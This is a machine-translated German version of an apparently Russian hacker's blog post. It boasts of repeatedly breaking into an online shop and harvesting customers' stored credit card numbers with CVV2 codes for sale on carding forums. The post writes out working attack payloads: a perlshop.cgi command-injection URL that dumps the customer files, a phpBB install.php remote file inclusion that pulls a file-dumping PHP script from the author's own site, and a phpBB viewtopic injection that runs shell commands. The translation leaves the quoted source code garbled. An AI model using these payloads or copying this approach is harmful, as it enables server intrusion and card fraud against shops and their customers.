This page has been robot translated, sorry for typos if any. Original content here.

Nützliche Artikel für einen Hacker und nicht nur

In meiner tiefen Kindheit, als eine Handvoll Freaks die UdSSR immer noch nicht ruinierte, hörte ich den Satz "Kampf um die Ernte". Und jetzt, als ich diesen Artikel schreibe, wurde mir klar, dass dieser Satz sein Titel werden wird.

Sie wissen wahrscheinlich, dass Hacker-Einnahmen episodisch und inkonsistent sind, während immer Geld für Essen, Bier und andere Freuden benötigt wird. Die meisten Kunden, die sich mit mir in Verbindung setzen, bitten darum, paypal.com oder ebay.com sofort zu hacken, wahrscheinlich unter der Annahme, dass zumindest der göttliche Ursprung der Hacker und insbesondere meines Ursprungs ist.
Ein Hacker kann sein hart verdientes Geld immer nur dann haben, wenn er ständigen Zugriff auf die Einkaufswagen mehrerer mittelgroßer Geschäfte hat, diese täglich erntet und in einem der Carder-Foren, beispielsweise bei Carder-World.ru, gegen immergrüne Einheiten eingetauscht werden. Heute hat der FSB fast alle Carder-Foren geschlossen, einschließlich Carder-World.ru . Es wäre besser, wenn die Wahhabis und Militanten, "Helden des Umhangs und des Dolches", gefangen würden.

Und ich möchte eine Geschichte über einen langen Wettbewerb mit dem Administrator eines solchen Elektronikladens erzählen.
Folge Eins
Vor mehr als einem Jahr habe ich eine Schwachstelle im perlshop.cgi-Skript version = 3.1 entdeckt
http://www.xakep.ru/post/21567/default.asp
Das Wesentliche des Fehlers war, dass es möglich war, Befehle auf dem Server auszuführen:
/perlshop.cgi?ACTION=enter&thispage=|ls;&ORDER_ID=!ORDERID!
Beim Anzeigen der Quelle wurde festgestellt, dass das Öffnen von Dateien im Katalogverzeichnis ohne Überprüfung auf Zeichen erfolgt ;

if (defined ($ input {'THISPAGE'})) {### Sende eine Katalogseite mit der eindeutigen ID zurück
$ prev_page = ""; $ next_page = "";
if ($ add_navigation eq 'yes') {
$ catalog_page = "$ catalog_directory / $ input {'THISPAGE'}";
if (-e $ catalog_page) {
öffnen (TEMPLATE, $ catalog_page) || & err_trap ("Vorlagendatei kann nicht geöffnet werden: $ catalog_page");
$ temp = <TEMPLATE>;
if ($ temp = ~ / <(\! \ - \ -)? PSTAG \ s + prevpage \ s * = \ s * \ "? ([^ \"] +?) \ "? \ s + nextpage \ s * = \ s * \ "? ([^ \"] +?) \ "? \ s * (\ - \ -)?> / i

Nachdem ich alle wichtigen Shops durchgesehen hatte, fand ich einen, in dem der Administrator trotz des Verbots Kreditkarten mit cvv2 gespeichert hatte. Da ich wusste, dass die Datenbank mit Credits standardmäßig im Kundenverzeichnis gespeichert ist, habe ich täglich eine neue Ernte auf diese einfache Weise aufgenommen:
/perlshop.cgi?ACTION=ENTER&thispage=|cat%20customers/*;&ORDER_ID=!ORDERID!
Leider gab es auf dem Server weder Wget noch Links, ich konnte die Shell nicht ausfüllen und dort Fuß fassen.

Aber mein Glück hielt nicht lange an, nach drei Monaten hatte der Shop-Administrator das Gefühl, dass etwas nicht stimmte, und als ich anstelle des Glaubensbekenntnisses eine URL heruntergeladen hatte, sah ich den „Oblomingo-Vogel“. Der Administrator hat den Warenkorb auf Version 4.4.0 geändert. Als ich es im Internet fand und mir die Quelle ansah, wurde mir klar, dass ich damit nicht zufrieden sein würde schneiden:
Öffnen Sie (TEMPLATE, $ catalog_page) oder
error_trap ("Vorlagendatei $ catalog_page: $! kann nicht geöffnet werden");

----------
gelöscht
----------
# Entfernen Sie ungültige Zeichen aus dem THISPAGE-Parameter
$ input {'THISPAGE'} = ~ s / [| () <>; &] // g;
Richtig, das Skript sucht nicht nach "Null-Byte-Gift". Nach meinem Verständnis liegt dies jedoch daran, dass diese Seite im Skript nur Dateien aus catalog - open (TEMPLATE, $ catalog_page) öffnen sollte.

Folge Zwei.
Hunger und Kälte lassen die Menschen intensiver nachdenken. Als ich merkte, dass der Haupteingang für mich abgeschnitten war, entschied ich mich, das Ersatzteil zu überprüfen. Nachdem ich den IP-Server durchbrochen hatte, sah ich, dass es auf ihm hundert und mehr Websites gibt. Es gab schon eine Chance.

Es begann eine blöde Arbeit, Websites zu durchsuchen. Und auf einem von ihnen wurde PhpBB 2.0.1 entdeckt. Als ich eine Beschreibung des Fehlers fand, löschte ich schnell die Datei functions_selects.php, die vom Forum-Skript install.php geladen wurde:
<? php
$ handle = opendir ('/');
echo "Directory handle: $ handle \ n";
echo "Files: \ n";
while ($ file = readdir ($ handle)) {
print "$ file \ n";
$ f = fopen ("/ $ file", "r");
fpassthru ($ f);
}
closedir ($ handle);
?>
Nachdem Sie es auf Ihre durito.narod.ru-Website im Includes-Verzeichnis hochgeladen und den Befehl ausgeführt haben
/forum/install.php?m=http://durito.narod.ru/ Ich habe eine Root-Liste. Ändern des Pfades und Hochladen der geänderten Dateien zu durito.narod.ru Ich bin zu den geschätzten Verzeichniskunden und seinem Reichtum gekommen. Das Leben wird besser.

Aber nicht lange, nach fünf Monaten verschwand das Bazhen-Forum.

Folge Drei
Ich will immer essen Und ich fing wieder an, Server-Sites nach Fehlern zu durchsuchen. Nochmals viel Glück PhpBB 2.0.8. Und hier wird gerade SQL Injection in Foren vor PhpBB 2.0.10 gefunden. Nachdem ich mich mit der Beschreibung der Sicherheitsanfälligkeit befasst habe, falle ich erneut in das Innere des Servers. Aber hier habe ich auf den ersten Mist gewartet, der Kundenordner war leer. Das zweite Problem ließ nicht lange auf sich warten und das Anzeigen von Dateien in den Benutzerverzeichnissen / home / benutzername / wurde ebenfalls geschlossen. Dateien konnten nur in / public_html / angezeigt werden. Dann entschied ich mich, die Quellen von perlshop.cgi zu durchsuchen und erkannte, warum es keine Gutschrift gab. Der Administrator hat die Datenbank nach / home / user_name / data / customers verschoben. Zum Glück hatte ich die Möglichkeit, den Inhalt darin anzuzeigen.

Durch Öffnen von viewtopic.php? T = 7 & highlight =% 2527. $ poster =% 60 $ cmd% 60.% 2527 & cmd = cat% 20 / home / benutzername / data / customers / *;
Ich war sehr überrascht, in der Basis lagen nur 2 Credits. Nachdem ich festgestellt hatte, dass der Laden ruiniert war, ging ich ins Bett.
Ein paar Tage später kehrte ich zurück und sah auch, dass sich ein Guthaben im Wagen befand, aber das waren ANDERE KREDITE! Ich begann mit der Überwachung des Speichers und stellte fest, dass der Administrator um etwa 7.30 Uhr morgens alle Daten zu Transaktionen pro Tag aus dem Kundenordner löschte. Die Ausnahme war nur der Sonntag. Daher war dies der einzige Tag in der Woche, an dem ich um 7 Uhr morgens nicht aufstand und nicht auf meinem Computer lief um die ernte schneller abzuholen als der admin. Also lebten wir noch ein halbes Jahr "Seele an Seele" mit ihm, ich stand eine halbe Stunde vor ihm auf und wie es heißt: "Wer früh aufsteht, der gibt Gott ihm."

Und gestern hat ein Bastard statt PhpBB 2.0.8 vBulletin Version 3.0.8 auf seiner Website installiert. Und wieder flatterte der rosa Oblomingo-Vogel mit meinem Flügel. Aber der Hacker ist ein geduldiger Vogel und der Hauptkampf um die Ernte mit dem Admin ist noch nicht beendet.

Z.Y. Der Kampf geht weiter, heute habe ich ein weiteres Loch beim Hoster gefunden, aber ich erzähle dir später davon


Dein Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!